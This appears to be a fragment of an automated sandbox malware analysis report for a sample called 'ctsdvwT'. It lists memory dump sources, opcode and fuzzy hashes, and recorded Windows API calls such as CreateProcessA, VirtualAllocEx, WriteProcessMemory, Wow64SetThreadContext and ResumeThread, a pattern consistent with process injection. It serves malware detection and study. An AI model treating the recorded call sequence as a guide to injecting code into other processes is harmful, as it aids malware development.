                                        • Opcode ID: 38e6eaa02a584e972e4e0f68e7fcdf0d60a030f5b843b99950a868a5c7637366
                                        • Instruction ID: 3ed7dde48442a9dae2a05426294a35a16537c92e925c5009e82679acbac2a3fd
                                        • Opcode Fuzzy Hash: 38e6eaa02a584e972e4e0f68e7fcdf0d60a030f5b843b99950a868a5c7637366
                                        • Instruction Fuzzy Hash: 80A19574B502098FCB489F79D9957AE7AF7BF88B00F21842AE906DB394DE74DC058B41

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Te]q$Te]q$$]q$$]q
                                        • API String ID: 0-3083981010
                                        • Opcode ID: 44d038bbc2117fba516fa16427cc401e8d126304a8a3455c08f206d010836ff3
                                        • Instruction ID: 5586c643269f21535a24515aebce9a4d4cb6736e2e8d1b07a970af07c7fe68ce
                                        • Opcode Fuzzy Hash: 44d038bbc2117fba516fa16427cc401e8d126304a8a3455c08f206d010836ff3
                                        • Instruction Fuzzy Hash: 1FB1C174B442198FCB44DF78D9A57AE7BF2BF88B00F14446AE806DB3A1DA74CC058B81

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $]q$$]q
                                        • API String ID: 0-127220927
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: T(z
                                        • API String ID: 0-3184255237
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: T(z
                                        • API String ID: 0-3184255237
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $]q$$]q
                                        • API String ID: 0-127220927
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $]q$$]q
                                        • API String ID: 0-127220927
                                        APIs
                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02D420F6
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2165156552.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2d40000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: CreateProcess
                                        • String ID:
                                        • API String ID: 963392458-0
                                        APIs
                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02D420F6
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2165156552.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2d40000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: CreateProcess
                                        • String ID:
                                        • API String ID: 963392458-0
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 02E0AFFE
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2165281235.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2e00000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        APIs
                                        • CreateActCtxA.KERNEL32(?), ref: 02E059C9
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2165281235.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2e00000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: Create
                                        • String ID:
                                        • API String ID: 2289755597-0
                                        APIs
                                        • CreateActCtxA.KERNEL32(?), ref: 02E059C9
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2165281235.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2e00000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: Create
                                        • String ID:
                                        • API String ID: 2289755597-0
                                        APIs
                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02D41CC8
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2165156552.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2d40000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: MemoryProcessWrite
                                        • String ID:
                                        • API String ID: 3559483778-0
                                        APIs
                                        • ResumeThread.KERNELBASE(?), ref: 02D4161A
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2165156552.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2d40000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        APIs
                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02D41DA8
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2165156552.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2d40000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: MemoryProcessRead
                                        • String ID:
                                        • API String ID: 1726664587-0
                                        APIs
                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02D41CC8
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2165156552.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2d40000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: MemoryProcessWrite
                                        • String ID:
                                        • API String ID: 3559483778-0
                                        APIs
                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 02D416E6
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2165156552.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2d40000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: ContextThreadWow64
                                        • String ID:
                                        • API String ID: 983334009-0
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02E0D646,?,?,?,?,?), ref: 02E0D707
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2165281235.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2e00000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        APIs
                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 02D416E6
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2165156552.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2d40000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: ContextThreadWow64
                                        • String ID:
                                        • API String ID: 983334009-0
                                        APIs
                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02D41DA8
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2165156552.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2d40000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: MemoryProcessRead
                                        • String ID:
                                        • API String ID: 1726664587-0
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02E0D646,?,?,?,?,?), ref: 02E0D707
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2165281235.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2e00000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        APIs
                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02D41BE6
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2165156552.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2d40000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        APIs
                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02E0B079,00000800,00000000,00000000), ref: 02E0B28A
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2165281235.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2e00000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID:
                                        • API String ID: 1029625771-0
                                        APIs
                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02D41BE6
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2165156552.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2d40000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        APIs
                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02E0B079,00000800,00000000,00000000), ref: 02E0B28A
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2165281235.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2e00000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID:
                                        • API String ID: 1029625771-0
                                        APIs
                                        • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,02D47D39,?,?), ref: 02D47EE0
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2165156552.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2d40000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: ChangeCloseFindNotification
                                        • String ID:
                                        • API String ID: 2591292051-0
                                        APIs
                                        • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,02D47D39,?,?), ref: 02D47EE0
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2165156552.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2d40000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: ChangeCloseFindNotification
                                        • String ID:
                                        • API String ID: 2591292051-0
                                        APIs
                                        • ResumeThread.KERNELBASE(?), ref: 02D4161A
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2165156552.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2d40000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        APIs
                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 02D452BD
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2165156552.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2d40000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: MessagePost
                                        • String ID:
                                        • API String ID: 410705778-0
                                        APIs
                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 02D452BD
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2165156552.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2d40000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: MessagePost
                                        • String ID:
                                        • API String ID: 410705778-0
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 02E0AFFE
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2165281235.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2e00000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Haq
                                        • API String ID: 0-725504367
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: r
                                        • API String ID: 0-1812594589
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Te]q
                                        • API String ID: 0-52440209
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4']q
                                        • API String ID: 0-1259897404
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Te]q
                                        • API String ID: 0-52440209
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Te]q
                                        • API String ID: 0-52440209
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4e151205390ba81c6b624cc066749fde233427a15ffb3103e659b215d89e81dd
                                        • Instruction ID: 648b661855626580e1a49dc64689a2b510b938d01a7a0710080ba651f571ef02
                                        • Opcode Fuzzy Hash: 4e151205390ba81c6b624cc066749fde233427a15ffb3103e659b215d89e81dd
                                        • Instruction Fuzzy Hash: 804137B0E1820D8FDB48DFAAD4546FEBBF6EB8A301F04D42AE419A2255DB345942CB54
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 17a0b721e238a329597fae5603d792b8ff3a9fbafe48f80e65016292d5c79a0c
                                        • Instruction ID: d288a080c5a8632db8a6584b505c53c70a0f8530f0e2572645961dd4c3a31b67
                                        • Opcode Fuzzy Hash: 17a0b721e238a329597fae5603d792b8ff3a9fbafe48f80e65016292d5c79a0c
                                        • Instruction Fuzzy Hash: 0941E4B4D2925ADFCB80EFA8E4848FEBBB4FB4E310F01585AE556A7311D7309815CB64
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1db0f9c1d018b0c5b4170d49c2226f87f1bef870990c0ac820d9756657ce399e
                                        • Instruction ID: 1d80c28bccb3c36d972a5b0443bea42ede1114328443e884858d643557a0d397
                                        • Opcode Fuzzy Hash: 1db0f9c1d018b0c5b4170d49c2226f87f1bef870990c0ac820d9756657ce399e
                                        • Instruction Fuzzy Hash: 8741C4B4D2925EDFCB80EFA8E4848FEBBB4FB4E210F41585AE516A7311D7309815CB64
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 16e1ddca5aeed86d00728cbdd3f9cc77d67bc7586a222c1e682a285bde6466a9
                                        • Instruction ID: d6af79f63928bb6684b3987ceee096a9ba7dca6bf880fb83af9847e525ccf8f4
                                        • Opcode Fuzzy Hash: 16e1ddca5aeed86d00728cbdd3f9cc77d67bc7586a222c1e682a285bde6466a9
                                        • Instruction Fuzzy Hash: 16418AB4E1421DDFCB45DFA9D984AEEFBB2BB0A300F509426E81AF7210DB349951DB14
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bf5cb4841e232492bb2609d838c7851709a311c2d64da184c95fe41c209a5f81
                                        • Instruction ID: 8c18549c8ce81ca80747f8507021828a8345554f82b87be336003e6392ac98d5
                                        • Opcode Fuzzy Hash: bf5cb4841e232492bb2609d838c7851709a311c2d64da184c95fe41c209a5f81
                                        • Instruction Fuzzy Hash: 6641E4B4D2925EDFCB80EFA8E4848FDBBB4FB4E301F01585AE516A7211DB309911CB24
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6798d84fe0d924e2ef3efadfc895ae32b1522705c619b7ce2156841e902bb9e8
                                        • Instruction ID: 503f31eb9453ffd2908ee649403553300c0492902791c6306feb7eb68c715063
                                        • Opcode Fuzzy Hash: 6798d84fe0d924e2ef3efadfc895ae32b1522705c619b7ce2156841e902bb9e8
                                        • Instruction Fuzzy Hash: E63106A07842994BCB4977BD446C1BF299BDFD5240B64546FDA06CB3C1DE24CC02C3A6
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6c682dcf30e2712c6f9476cf21dfc087bdccacd86fbd053e5e70c26118211acf
                                        • Instruction ID: bddca80c2b66bb0d5a66135058805bc9091fc0a01abc6b84c1a5c649ff5870c7
                                        • Opcode Fuzzy Hash: 6c682dcf30e2712c6f9476cf21dfc087bdccacd86fbd053e5e70c26118211acf
                                        • Instruction Fuzzy Hash: EE31A275A001498FCB05DFA4C994AEE7BF6EF49700F1580AAE905AB361DB35ED05CF50
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 70e624d71d2049bb2f69fcd282d088c7491193bba760fee0d2aa568401f40a7f
                                        • Instruction ID: cbac2b26395a55e93f0ae73378a6f12e5d75727cf6ae8d58c2b9b336f4a503ef
                                        • Opcode Fuzzy Hash: 70e624d71d2049bb2f69fcd282d088c7491193bba760fee0d2aa568401f40a7f
                                        • Instruction Fuzzy Hash: E83139B1900209AFCF54EFA9D844ADEBFF9EF48310F10842AE519E7350D735A944CBA5
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2164388466.0000000002C6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C6D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2c6d000_ctsdvwT.jbxd
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2164529336.0000000002C7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C7D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2c7d000_ctsdvwT.jbxd
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 57ec2770e793f79e0e4be04e97af68ec64e03a8ca17a6cd31753296ca469dd51
                                        • Instruction ID: fc94466d32cb43094147064cdda654e1e80a9f9a370b336e968c186984809adb
                                        • Opcode Fuzzy Hash: 57ec2770e793f79e0e4be04e97af68ec64e03a8ca17a6cd31753296ca469dd51
                                        • Instruction Fuzzy Hash: F8019E707567498FE345AF28C845F5A3BA9AF86700F9A80E6E115CF3B6CB25D805CB01
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2164388466.0000000002C6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C6D000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_2c6d000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8b2021e8e18558fc0a188907d36099ca747cf6532d56b491ca8b0c62bcce2c48
                                        • Instruction ID: c0310bcf3ce6b8343e3d52b6d0c6f7feefc19a01e8715d80fdff6e0c8faa6a19
                                        • Opcode Fuzzy Hash: 8b2021e8e18558fc0a188907d36099ca747cf6532d56b491ca8b0c62bcce2c48
                                        • Instruction Fuzzy Hash: F401DB712043449EE7208A16DDC8B77FF9CEF95724F18C86AED0A4A28EC3799840C672
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8ae1243b867a7b80473542b03201f62fb9c6e0049d0c10b1bc15532d06a7dfc0
                                        • Instruction ID: 832c66a21fd8873b05720fd507eaa8d4d4d70bebed8296afa958e7cd9e3a65f1
                                        • Opcode Fuzzy Hash: 8ae1243b867a7b80473542b03201f62fb9c6e0049d0c10b1bc15532d06a7dfc0
                                        • Instruction Fuzzy Hash: 12018F35A20618CBCB189F76D85949EBBBBFFC8765B00453EE50683360DF71A919CB90
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 40449b25b4c11f1e8be099a97bbc44a7827cc5f7d2bfe910250af5ebda2a4a3a
                                        • Instruction ID: fd1cbbc7ab8500fbe452e76e352f20ef23777cf0da52441a25cd879a75500357
                                        • Opcode Fuzzy Hash: 40449b25b4c11f1e8be099a97bbc44a7827cc5f7d2bfe910250af5ebda2a4a3a
                                        • Instruction Fuzzy Hash: 0AF0F4B0A5824C9FC74AAB748C655AD7FB8DF8260472488DBE404CB382EE30CC058392
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ad37b30b399b84e937c87377b6bbeca499245afcfd74594f89edc35166200929
                                        • Instruction ID: e617428e7bf6a3659321c027f96449941be1641fa4e1878b6a0799f7ae2f1a4f
                                        • Opcode Fuzzy Hash: ad37b30b399b84e937c87377b6bbeca499245afcfd74594f89edc35166200929
                                        • Instruction Fuzzy Hash: 5E1161B180021EDFDB91EFA9C4047EFBBB1EF44364F118526E9649B291D7718A44CBD2
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b24ded465a61e6dfd09f81672fa67bb8cb92fa4b8e9a2b411fecabd236864e8b
                                        • Instruction ID: bbb087058844fd8b4524c83d09269eb0a910734e1a0455772148676e560e26a4
                                        • Opcode Fuzzy Hash: b24ded465a61e6dfd09f81672fa67bb8cb92fa4b8e9a2b411fecabd236864e8b
                                        • Instruction Fuzzy Hash: 1301D13030510A8FC785AB3CEA59A5A76DBEBC9241B11453AE10ACB369CF34DC0A8790
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.2169708930.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7480000_ctsdvwT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0e0c06edef178fb1a2869411e9d63c7ae29ba7e0231a7f2fdb4287ec5965a2a5
                                        • Instruction ID: d32f9e9c11ac4a705e033ae71ffef6b637f06eecf811fd071a86bd5f6edbdf43
                                        • Opcode Fuzzy Hash: 0e0c06edef178fb1a2869411e9d63c7ae29ba7e0231a7f2fdb4287ec5965a2a5
                                        • Instruction Fuzzy Hash: A5011674A1A108DFCB44EFA8C684AADBBF5AF4E300F159495E8089B362DB309E01DF40
                                        Memory Dump Source
